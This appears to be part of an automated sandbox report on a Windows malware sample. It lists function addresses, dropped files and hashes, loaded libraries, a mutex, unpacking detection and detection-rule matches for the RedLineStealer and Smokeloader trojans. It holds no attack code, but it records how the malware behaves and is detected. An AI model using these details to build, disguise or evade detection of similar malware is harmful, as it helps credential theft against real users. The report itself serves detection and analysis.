Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043F330	4_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042A33F	4_2_0042A33F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0040DBD9	4_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00424380	4_2_00424380
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041FC75	4_2_0041FC75
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041DC00	4_2_0041DC00
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00429C2B	4_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004291DD	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004074F0	4_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0040ACF0	4_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041148F	4_2_0041148F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042AC90	4_2_0042AC90
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043ECA0	4_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0040CD46	4_2_0040CD46
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00437500	4_2_00437500
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00422510	4_2_00422510
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00417DEE	4_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00437DF0	4_2_00437DF0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00409580	4_2_00409580
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041759F	4_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00425E70	4_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00436E74	4_2_00436E74
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00427603	4_2_00427603
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00425E30	4_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004286C0	4_2_004286C0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043AEC0	4_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004266D0	4_2_004266D0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004236E2	4_2_004236E2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00405EE0	4_2_00405EE0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041DE80	4_2_0041DE80
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00402F50	4_2_00402F50
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00420F50	4_2_00420F50
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00438F59	4_2_00438F59
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00406710	4_2_00406710
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00423F20	4_2_00423F20
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043F720	4_2_0043F720
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00419F30	4_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041E7C0	4_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004197C2	4_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042DFE9	4_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0040A780	4_2_0040A780
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00411F90	4_2_00411F90
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00418792	4_2_00418792
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00415799	4_2_00415799
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043EFB0	4_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009160D7	4_2_009160D7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009270DB	4_2_009270DB
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090E0E7	4_2_0090E0E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00908055	4_2_00908055
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00928057	4_2_00928057
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090A197	4_2_0090A197
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009111B7	4_2_009111B7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009021F7	4_2_009021F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092B127	4_2_0092B127
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F6147	4_2_008F6147
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00913166	4_2_00913166
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092F217	4_2_0092F217
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090D230	4_2_0090D230
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091E250	4_2_0091E250
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009123F7	4_2_009123F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090E4F7	4_2_0090E4F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F64E7	4_2_008F64E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F9417	4_2_008F9417
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00919444	4_2_00919444
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092F597	4_2_0092F597
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F4587	4_2_008F4587
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F8597	4_2_008F8597
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092D5B4	4_2_0092D5B4
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091351D	4_2_0091351D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090B547	4_2_0090B547
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00915694	4_2_00915694
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00914687	4_2_00914687
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_009016F6	4_2_009016F6
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F97E7	4_2_008F97E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F7757	4_2_008F7757
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00912777	4_2_00912777
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00927767	4_2_00927767
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00907806	4_2_00907806
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092F987	4_2_0092F987
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008FA9E7	4_2_008FA9E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00916937	4_2_00916937
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00918927	4_2_00918927
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F6977	4_2_008F6977
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F8AB7	4_2_008F8AB7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090EA27	4_2_0090EA27
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00909A29	4_2_00909A29
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00928A77	4_2_00928A77
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00910BA0	4_2_00910BA0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00920BA7	4_2_00920BA7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F3BD7	4_2_008F3BD7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F5BF7	4_2_008F5BF7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00911B07	4_2_00911B07
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091CCB0	4_2_0091CCB0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091DCBC	4_2_0091DCBC
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008FEC77	4_2_008FEC77
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091CD89	4_2_0091CD89
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091CD37	4_2_0091CD37
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091CD78	4_2_0091CD78
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00926D6F	4_2_00926D6F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090FEDC	4_2_0090FEDC
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0091AEF7	4_2_0091AEF7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008FDE40	4_2_008FDE40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090CE63	4_2_0090CE63
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0090DE67	4_2_0090DE67
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008FCFAD	4_2_008FCFAD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092EF07	4_2_0092EF07
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00906F35	4_2_00906F35

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\E093.tmp.exe 174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: String function: 024B0987 appears 53 times
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: String function: 024B0019 appears 121 times
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: String function: 00414400 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: String function: 00904667 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: String function: 008F8297 appears 72 times

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656

Source: sqJIHyPqhr.exe	Binary or memory string: OriginalFileName vs sqJIHyPqhr.exe
Source: sqJIHyPqhr.exe, 00000000.00000003.2456196021.0000000002570000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe
Source: sqJIHyPqhr.exe, 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe
Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs sqJIHyPqhr.exe

Source: sqJIHyPqhr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: sqJIHyPqhr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: E093.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@2/3

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_009DA456 CreateToolhelp32Snapshot,Module32First,

0_2_009DA456

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Code function: 4_2_00430C70 CoCreateInstance,

4_2_00430C70

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

File created: C:\Users\user\AppData\Local\Temp\E093.tmp

Jump to behavior

Source: sqJIHyPqhr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sqJIHyPqhr.exe

ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\sqJIHyPqhr.exe "C:\Users\user\Desktop\sqJIHyPqhr.exe"
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Process created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Process created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Unpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Unpacked PE file: 0.2.sqJIHyPqhr.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Unpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_009DD04D push 00000003h; ret	0_2_009DD051
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_009DB2A2 push es; iretd	0_2_009DB2B3
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_009DCBAC pushad ; ret	0_2_009DCBD4
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B09CD push ecx; ret	0_2_024B09E0
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D799F push esp; retf	0_2_024D79A7
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024BCE18 push ss; retf	0_2_024BCE1D
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024AFFF3 push ecx; ret	0_2_024B0006
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D7F9D push esp; retf	0_2_024D7F9E
